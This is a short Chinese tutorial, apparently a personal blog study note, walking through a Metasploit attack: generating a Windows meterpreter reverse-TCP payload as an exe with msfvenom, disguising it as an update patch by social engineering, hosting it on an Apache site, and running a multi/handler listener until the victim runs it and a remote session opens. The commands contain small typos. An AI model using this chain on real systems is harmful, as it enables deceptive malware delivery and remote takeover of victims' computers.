#江南的江
#每日鸡汤:泪水和汗水的化学成分相似,但前者只能为你换来同情,后则却可以为你赢得成功。
#初心和目标:争取拿到7ools 的账号。
MSFVENOM
Msfvenom是一个自定义的载荷系统,他是基于msf框架下的附属软件,例如他可以将载荷制成exe文件,然后经过对目标的输出或者社会工程,来对目标进行控制。
实验环境:
攻击机kali
目标windows7(目标不做特殊要求,主要没有安装杀毒和启动病毒防护就行)
先用kali,msfvenom -p windows/meterpreter/revese_tcp
Lhost=XXX.XXX.XXX.XXX???? lport=5555 ?-f exe > (指定一个文件名且后缀为exe的)test.exe
那么如何让目标获得这个文件呢?这要靠你的社会工程学
例如把名字改的好点像是什么更新补丁什么的。
接着我们用apache2来创建一个网站,然后用这个网站达到让目标获得文件的效果
在让目标进行之前先打开msfconsole进行监听
用的是use exploit/multi/handler
Set lhost XXX.XXX.XXX.XXX
Set lport XXX.XXX.XXX.XXX
上面的这些值是你预先在exe文件中设置好的。
然后再设置相应的攻击载荷:
Set payload windows/meterpreter/reverse_tcp
Run
出现这个就表明正在监听,然后让目标打开并使用test.exe文件
成功打入
下面就可以自由的利用吗meterpreter工具箱了